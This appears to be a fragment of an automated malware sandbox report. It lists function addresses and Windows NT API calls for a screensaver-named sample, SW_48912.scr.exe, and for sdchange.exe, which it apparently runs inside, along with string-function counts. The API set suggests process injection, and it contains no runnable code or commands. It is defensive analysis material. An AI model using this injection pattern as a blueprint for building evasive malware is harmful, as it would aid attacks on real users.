                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2C60 NtCreateKey,LdrInitializeThunk,10_2_046D2C60
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_046D2C70
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_046D2CA0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_046D2D30
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2D10 NtMapViewOfSection,LdrInitializeThunk,10_2_046D2D10
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_046D2DF0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2DD0 NtDelayExecution,LdrInitializeThunk,10_2_046D2DD0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2EE0 NtQueueApcThread,LdrInitializeThunk,10_2_046D2EE0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_046D2E80
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2F30 NtCreateSection,LdrInitializeThunk,10_2_046D2F30
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2FE0 NtCreateFile,LdrInitializeThunk,10_2_046D2FE0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2FB0 NtResumeThread,LdrInitializeThunk,10_2_046D2FB0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2AF0 NtWriteFile,LdrInitializeThunk,10_2_046D2AF0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2AD0 NtReadFile,LdrInitializeThunk,10_2_046D2AD0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2B60 NtClose,LdrInitializeThunk,10_2_046D2B60
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2BE0 NtQueryValueKey,LdrInitializeThunk,10_2_046D2BE0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_046D2BF0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_046D2BA0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D35C0 NtCreateMutant,LdrInitializeThunk,10_2_046D35C0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D39B0 NtGetContextThread,LdrInitializeThunk,10_2_046D39B0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2C00 NtQueryInformationProcess,10_2_046D2C00
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2CF0 NtOpenProcess,10_2_046D2CF0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2CC0 NtQueryVirtualMemory,10_2_046D2CC0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2D00 NtSetInformationFile,10_2_046D2D00
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2DB0 NtEnumerateKey,10_2_046D2DB0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2E30 NtWriteVirtualMemory,10_2_046D2E30
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2EA0 NtAdjustPrivilegesToken,10_2_046D2EA0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2F60 NtCreateProcessEx,10_2_046D2F60
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2FA0 NtQuerySection,10_2_046D2FA0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2F90 NtProtectVirtualMemory,10_2_046D2F90
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2AB0 NtWaitForSingleObject,10_2_046D2AB0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2B80 NtQueryInformationFile,10_2_046D2B80
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D3010 NtOpenDirectoryObject,10_2_046D3010
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D3090 NtSetValueKey,10_2_046D3090
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D3D70 NtOpenThread,10_2_046D3D70
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D3D10 NtOpenProcessToken,10_2_046D3D10
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_02728F20 NtCreateFile,10_2_02728F20
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_02729220 NtClose,10_2_02729220
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_02729390 NtAllocateVirtualMemory,10_2_02729390
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_02729090 NtReadFile,10_2_02729090
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_02729180 NtDeleteFile,10_2_02729180
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_0239E7140_2_0239E714
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_0667773C0_2_0667773C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_0667819A0_2_0667819A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06B8E4280_2_06B8E428
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06B8E8600_2_06B8E860
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06B897880_2_06B89788
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06B8DFF00_2_06B8DFF0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06F80EB80_2_06F80EB8
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06F87CA80_2_06F87CA8
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06F809C00_2_06F809C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_004185135_2_00418513
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040E0485_2_0040E048
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040E0535_2_0040E053
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_004030805_2_00403080
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_004028B05_2_004028B0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_004012005_2_00401200
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0042EB635_2_0042EB63
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_00402C325_2_00402C32
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040FCEC5_2_0040FCEC
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040FCF35_2_0040FCF3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040251D5_2_0040251D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_004025205_2_00402520
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040DEFA5_2_0040DEFA
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040DF035_2_0040DF03
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040FF135_2_0040FF13
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_004167235_2_00416723
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014781585_2_01478158
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E01005_2_013E0100
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148A1185_2_0148A118
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A81CC5_2_014A81CC
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B01AA5_2_014B01AA
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A41A25_2_014A41A2
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014820005_2_01482000
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AA3525_2_014AA352
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B03E65_2_014B03E6
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FE3F05_2_013FE3F0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014902745_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014702C05_2_014702C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F05355_2_013F0535
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B05915_2_014B0591
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A24465_2_014A2446
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014944205_2_01494420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149E4F65_2_0149E4F6
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014147505_2_01414750
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F07705_2_013F0770
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EC7C05_2_013EC7C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140C6E05_2_0140C6E0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014069625_2_01406962
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F29A05_2_013F29A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014BA9A65_2_014BA9A6
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FA8405_2_013FA840
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F28405_2_013F2840
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D68B85_2_013D68B8
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E8F05_2_0141E8F0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AAB405_2_014AAB40
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A6BD75_2_014A6BD7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EEA805_2_013EEA80
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FAD005_2_013FAD00
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148CD1F5_2_0148CD1F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EADE05_2_013EADE0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01408DBF5_2_01408DBF
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0C005_2_013F0C00
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E0CF25_2_013E0CF2
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490CB55_2_01490CB5
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01464F405_2_01464F40
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01432F285_2_01432F28
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01410F305_2_01410F30
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01492F305_2_01492F30
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146EFA05_2_0146EFA0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E2FC85_2_013E2FC8
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0E595_2_013F0E59
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AEE265_2_014AEE26
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AEEDB5_2_014AEEDB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01402E905_2_01402E90
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014ACE935_2_014ACE93
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014BB16B5_2_014BB16B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0142516C5_2_0142516C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DF1725_2_013DF172
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FB1B05_2_013FB1B0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149F0CC5_2_0149F0CC
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A70E95_2_014A70E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AF0E05_2_014AF0E0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F70C05_2_013F70C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A132D5_2_014A132D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DD34C5_2_013DD34C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0143739A5_2_0143739A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140B2C05_2_0140B2C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F52A05_2_013F52A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014912ED5_2_014912ED
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140D2F05_2_0140D2F0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A75715_2_014A7571
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B95C35_2_014B95C3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148D5B05_2_0148D5B0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E14605_2_013E1460
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AF43F5_2_014AF43F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AF7B05_2_014AF7B0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014356305_2_01435630
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A16CC5_2_014A16CC
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140B9505_2_0140B950
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014859105_2_01485910
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F99505_2_013F9950
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145D8005_2_0145D800
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F38E05_2_013F38E0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AFB765_2_014AFB76
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01465BF05_2_01465BF0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0142DBF95_2_0142DBF9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140FB805_2_0140FB80
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AFA495_2_014AFA49
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A7A465_2_014A7A46
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01463A6C5_2_01463A6C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149DAC65_2_0149DAC6
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01435AA05_2_01435AA0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148DAAC5_2_0148DAAC
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01491AA35_2_01491AA3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A1D5A5_2_014A1D5A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A7D735_2_014A7D73
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F3D405_2_013F3D40
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140FDC05_2_0140FDC0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01469C325_2_01469C32
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AFCF25_2_014AFCF2
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AFF095_2_014AFF09
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F1F925_2_013F1F92
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013B3FD25_2_013B3FD2
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013B3FD55_2_013B3FD5
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AFFB15_2_014AFFB1
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F9EB05_2_013F9EB0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0475244610_2_04752446
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0474442010_2_04744420
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0474E4F610_2_0474E4F6
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046A053510_2_046A0535
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0476059110_2_04760591
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046BC6E010_2_046BC6E0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046A077010_2_046A0770
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046C475010_2_046C4750
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0469C7C010_2_0469C7C0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0473200010_2_04732000
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0472815810_2_04728158
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0469010010_2_04690100
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0473A11810_2_0473A118
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_047581CC10_2_047581CC
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_047541A210_2_047541A2
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_047601AA10_2_047601AA
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0474027410_2_04740274
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_047202C010_2_047202C0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0475A35210_2_0475A352
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_047603E610_2_047603E6
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046AE3F010_2_046AE3F0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046A0C0010_2_046A0C00
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_04690CF210_2_04690CF2
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_04740CB510_2_04740CB5
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046AAD0010_2_046AAD00
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0473CD1F10_2_0473CD1F
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0469ADE010_2_0469ADE0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046B8DBF10_2_046B8DBF
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046A0E5910_2_046A0E59
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0475EE2610_2_0475EE26
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0475EEDB10_2_0475EEDB
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0475CE9310_2_0475CE93
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046B2E9010_2_046B2E90
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_04714F4010_2_04714F40
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_04742F3010_2_04742F30
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046E2F2810_2_046E2F28
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046C0F3010_2_046C0F30
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_04692FC810_2_04692FC8
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0471EFA010_2_0471EFA0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046A284010_2_046A2840
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046AA84010_2_046AA840
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046CE8F010_2_046CE8F0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046868B810_2_046868B8
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046B696210_2_046B6962
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046A29A010_2_046A29A0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0476A9A610_2_0476A9A6
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0469EA8010_2_0469EA80
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0475AB4010_2_0475AB40
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_04756BD710_2_04756BD7
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0469146010_2_04691460
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0475F43F10_2_0475F43F
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0475757110_2_04757571
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_047695C310_2_047695C3
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0473D5B010_2_0473D5B0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046E563010_2_046E5630
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_047516CC10_2_047516CC
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0475F7B010_2_0475F7B0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0475F0E010_2_0475F0E0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_047570E910_2_047570E9
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046A70C010_2_046A70C0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0474F0CC10_2_0474F0CC
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D516C10_2_046D516C
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0468F17210_2_0468F172
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0476B16B10_2_0476B16B
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046AB1B010_2_046AB1B0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_047412ED10_2_047412ED
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046BD2F010_2_046BD2F0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046BB2C010_2_046BB2C0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046A52A010_2_046A52A0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0468D34C10_2_0468D34C
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0475132D10_2_0475132D
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046E739A10_2_046E739A
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_04719C3210_2_04719C32
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0475FCF210_2_0475FCF2
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_04757D7310_2_04757D73
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046A3D4010_2_046A3D40
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_04751D5A10_2_04751D5A
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046BFDC010_2_046BFDC0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046A9EB010_2_046A9EB0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0475FF0910_2_0475FF09
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_04663FD510_2_04663FD5
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_04663FD210_2_04663FD2
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0475FFB110_2_0475FFB1
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046A1F9210_2_046A1F92
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0470D80010_2_0470D800
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046A38E010_2_046A38E0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046A995010_2_046A9950
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046BB95010_2_046BB950
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0473591010_2_04735910
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_04713A6C10_2_04713A6C
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_04757A4610_2_04757A46
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0475FA4910_2_0475FA49
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0474DAC610_2_0474DAC6
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046E5AA010_2_046E5AA0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_04741AA310_2_04741AA3
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0473DAAC10_2_0473DAAC
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0475FB7610_2_0475FB76
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_04715BF010_2_04715BF0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046DDBF910_2_046DDBF9
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046BFB8010_2_046BFB80
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_02711B5010_2_02711B50
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0270ABF010_2_0270ABF0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0270ABE710_2_0270ABE7
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0270C9E010_2_0270C9E0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0270C9D910_2_0270C9D9
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0270CC0010_2_0270CC00
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0270AD4010_2_0270AD40
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0270AD3510_2_0270AD35
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0271520010_2_02715200
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0271341010_2_02713410
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0272B85010_2_0272B850
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0457E68E10_2_0457E68E
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0457D75810_2_0457D758
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0457E2F710_2_0457E2F7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: String function: 01425130 appears 58 times
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: String function: 0146F290 appears 103 times
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: String function: 01437E54 appears 107 times
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: String function: 013DB970 appears 262 times
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: String function: 0145EA12 appears 86 times
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 0471F290 appears 103 times
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 046D5130 appears 58 times
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: String function: 0468B970 appears 262 times
